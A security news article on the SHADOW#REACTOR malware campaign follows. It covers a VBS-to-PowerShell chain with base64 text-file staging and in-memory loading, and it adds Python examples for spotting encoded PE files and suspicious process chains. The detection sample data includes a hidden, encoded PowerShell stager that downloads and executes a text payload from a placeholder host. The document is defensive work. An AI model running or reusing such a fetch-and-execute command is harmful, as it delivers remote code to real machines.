
New Windows Malware Uses Text Files to Evade Detection

Security researchers have uncovered a sophisticated multi-stage Windows malware campaign dubbed SHADOW#REACTOR, marking a significant evolution in how threat actors deliver remote access tools (RATs) while evading detection.

The campaign combines traditional scripting techniques with modern obfuscation layers, leveraging living-off-the-land tactics and a text-only staging pipeline to bypass endpoint security defenses.


Infection Chain: From VBS to PowerShell

The attack begins with an obfuscated Visual Basic Script (VBS) delivered via compromised websites or social engineering lures. Once executed, the script launches PowerShell processes that retrieve fragmented payload components from remote infrastructure.

Key characteristics:

  • Payload fragments stored as plain text files (e.g., qpwoe32.txt, qpwoe64.txt, teste32.txt, teste64.txt, config.txt); the 32/64 suffixes suggest per-architecture variants
  • Base64-encoded .NET assemblies stored as ordinary text rather than as executables
  • Download loops with size thresholds and retry logic, so a truncated fragment is re-fetched rather than executed

This modular design allows attackers to update individual stages independently, reducing operational overhead and improving resilience.


Text-Only Staging Pipeline: A Novel Approach

Unlike conventional malware delivery, SHADOW#REACTOR never hosts a binary executable. The attackers keep every stage as encoded content inside text files, which file-type and reputation checks treat as harmless text.

Once downloaded, subsequent stages:

  • Decode base64 content
  • Reconstruct .NET assemblies entirely in memory
  • Use reflective loading techniques to execute without writing binaries to disk

This shifts the detectable moment from the download to runtime. Static and file-type scanning tuned to executables sees only a .txt fetched by PowerShell; what remains observable is the base64 decode, the in-memory assembly load (in PowerShell typically through .NET reflection APIs such as Assembly.Load) and the behaviour of the resulting process.
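The check a practitioner wants at this point is whether a downloaded text file actually carries an encoded executable. The following Python is an added example, not code from the article or from the campaign: it strips whitespace, looks for the base64 prefix every encoded PE begins with (`TV` followed by `o`, `p`, `q` or `r`, the encoding of `MZ`), decodes the run, validates the PE signature and reads the CLR data directory that marks a .NET assembly. The PE header in the sample text is constructed by hand (no sections, not loadable) purely so the scanner has something to find.

```python
import base64
import binascii
import re
import struct

# Added example (not from the original article or the campaign itself): a scanner for
# text that carries a base64-encoded PE, with a check for the CLR header that marks a
# .NET assembly. The sample PE below is constructed by hand and is not a real binary.

PE32, PE32PLUS = 0x10B, 0x20B
CLR_DIR = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def inspect_pe(data: bytes):
    """Return {'pe', 'machine', 'dotnet'} if data starts with a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    info = {"pe": True, "machine": machine, "dotnet": False}
    opt = e_lfanew + 24  # optional header follows the 4-byte signature and 20-byte COFF header
    if opt + 2 > len(data):
        return info
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32:
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS:
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        return info
    if ndirs_off + 4 > len(data):
        return info
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    clr_entry = dirs_off + CLR_DIR * 8
    if ndirs > CLR_DIR and clr_entry + 8 <= len(data):
        rva, size = struct.unpack_from("<II", data, clr_entry)
        info["dotnet"] = rva != 0 and size != 0  # non-zero CLR directory => managed assembly
    return info


MARKER = re.compile(r"TV[opqr]")            # base64 of any bytes starting with b"MZ" begins this way
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def scan_text(text: str):
    """Find base64 runs that decode to a PE. Offsets are into the whitespace-stripped text."""
    compact = re.sub(r"\s+", "", text)      # line-wrapped base64 becomes one contiguous run
    findings = []
    for m in MARKER.finditer(compact):
        run = B64_RUN.match(compact, m.start())
        if not run:
            continue
        chunk = run.group(0)
        chunk = chunk[: len(chunk) - len(chunk) % 4]  # drop a ragged tail from adjacent text
        try:
            blob = base64.b64decode(chunk, validate=True)
        except (binascii.Error, ValueError):
            continue
        info = inspect_pe(blob)
        if info:
            findings.append({"offset": m.start(), "size": len(blob), **info})
    return findings


def build_fake_pe(pe32plus: bool, dotnet: bool) -> bytes:
    """Constructed minimal PE header (no sections, not loadable) used only for the sample text."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if pe32plus else 224
    machine = 0x8664 if pe32plus else 0x14C
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS if pe32plus else PE32)
    ndirs_off = 108 if pe32plus else 92
    struct.pack_into("<I", opt, ndirs_off, 16)
    if dotnet:
        struct.pack_into("<II", opt, ndirs_off + 4 + CLR_DIR * 8, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed sample: a 76-column-wrapped base64 .NET PE between two innocuous lines.
_pe_b64 = base64.b64encode(build_fake_pe(pe32plus=False, dotnet=True)).decode()
SAMPLE_TEXT = (
    "# stage 2 fragment (constructed sample)\n"
    + "\n".join(_pe_b64[i:i + 76] for i in range(0, len(_pe_b64), 76)) + "\n"
    + "trailer: " + base64.b64encode(bytes(96)).decode() + "\n"  # long base64 that is not a PE
)

if __name__ == "__main__":
    for f in scan_text(SAMPLE_TEXT):
        print(f)
```

The marker pre-filter keeps the scanner cheap on large text corpora, and the PE signature check rejects the occasional false `TVo` inside unrelated base64. Its limit is the page's own: it assumes plain base64, so a fragment that is additionally reversed, XORed or split across files would need the corresponding transform applied first.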


Behavioral Indicators and Detection

Securonix analysts detected the campaign after observing:

  • wscript.exe spawning multiple PowerShell instances
  • Extensive inline commands with base64 decoding operations
  • Unusual patterns in PowerShell command construction

The final payload was identified as Remcos RAT, a commercially available remote administration tool repurposed for malicious use.
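The three behavioural indicators above translate directly into rules. As an added illustration (this is not Securonix's detection content or anything from the campaign), the following Python runs them over constructed Sysmon Event ID 1 style process-creation records: a script-host parent spawning PowerShell, inline base64 work on the command line (decoding `-EncodedCommand`, which carries UTF-16LE script text), and one parent fanning out to several PowerShell children. The PIDs, paths, the 203.0.113.10 host and the invoice.vbs name are made up for the sample; qpwoe32.txt and config.txt are the fragment names the article lists.

```python
import base64
import re
from collections import defaultdict

# Added example, not Securonix's or the campaign's code. Detection logic for the
# process chain the article describes (wscript.exe -> several powershell.exe children
# running inline base64 work), run over constructed Sysmon Event ID 1 style records.
# PIDs, paths, the 203.0.113.10 host and invoice.vbs are made up for the sample.

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# -EncodedCommand and the abbreviations powershell.exe accepts (-e, -ec, -enc)
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
INLINE_B64 = re.compile(r"FromBase64String", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return alerts for script-host -> PowerShell chains and for one host fanning out to several."""
    alerts = []
    children = defaultdict(list)
    for ev in events:
        child, parent = basename(ev["image"]), basename(ev["parent"])
        if child not in POWERSHELL or parent not in SCRIPT_HOSTS:
            continue
        children[ev["ppid"]].append(ev["pid"])
        decoded = None
        m = ENC_FLAG.search(ev["cmd"])
        if m:
            decoded = decode_encoded_command(m.group(1))
        inline = bool(INLINE_B64.search(ev["cmd"]) or (decoded and INLINE_B64.search(decoded)))
        alerts.append({
            "rule": "script-host-spawned-powershell",
            "pid": ev["pid"], "ppid": ev["ppid"], "parent": parent,
            "encoded_command": decoded,   # surfaced so an analyst sees the real script text
            "inline_base64": inline,
        })
    for ppid, pids in children.items():
        if len(pids) >= 2:
            alerts.append({"rule": "script-host-powershell-fanout",
                           "ppid": ppid, "children": sorted(pids)})
    return alerts


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (base64 over UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed stager text and events; 203.0.113.10 is a documentation address.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/qpwoe32.txt')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"

SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812, "image": WSCRIPT, "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice.vbs"'},
    {"pid": 4188, "ppid": 4120, "image": PS, "parent": WSCRIPT,
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -enc " + _enc(STAGER)},
    {"pid": 4230, "ppid": 4120, "image": PS, "parent": WSCRIPT,
     "cmd": r"powershell.exe -NoProfile -Command $b=[Convert]::FromBase64String((Get-Content $env:TEMP\config.txt))"},
    # benign: an interactive PowerShell started from Explorer
    {"pid": 5010, "ppid": 812, "image": PS, "parent": r"C:\Windows\explorer.exe", "cmd": "powershell.exe"},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(a)
```

The fan-out rule is what separates this chain from the occasional legitimate logon script that launches one PowerShell: a single wscript.exe parent with two or more PowerShell children, each carrying encoded or base64-decoding command lines, is the shape the analysts describe. In production the same logic applies to Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled.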


Resilience and Evasion Tactics

SHADOW#REACTOR employs:

  • Size thresholds and redundancy checks so an incomplete download is never executed
  • Timeouts and retries for failed transfers
  • In-memory execution, so no executable is written to disk and little is left for forensic review

These techniques keep delivery reliable while steering clear of the drop-and-execute patterns that endpoint detection and response (EDR) rules are typically built around.


Why This Matters

The campaign illustrates a growing trend toward fileless malware, modular staging, and text-based payload delivery, challenging conventional security models.

Organizations should:

  • Monitor for script-host-to-PowerShell process chains (wscript.exe or cscript.exe spawning powershell.exe), especially one parent fanning out to several children
  • Enable PowerShell Script Block Logging (Event ID 4104) and alert on inline -EncodedCommand and FromBase64String usage
  • Enforce application control (for example AppLocker or WDAC) to restrict script execution
  • Hunt for living-off-the-land techniques rather than relying on file-based signatures alone

SHADOW#REACTOR underscores the need for multi-layered defense strategies as attackers innovate beyond binary-based delivery, leveraging legitimate system tools and obfuscation to stay undetected.
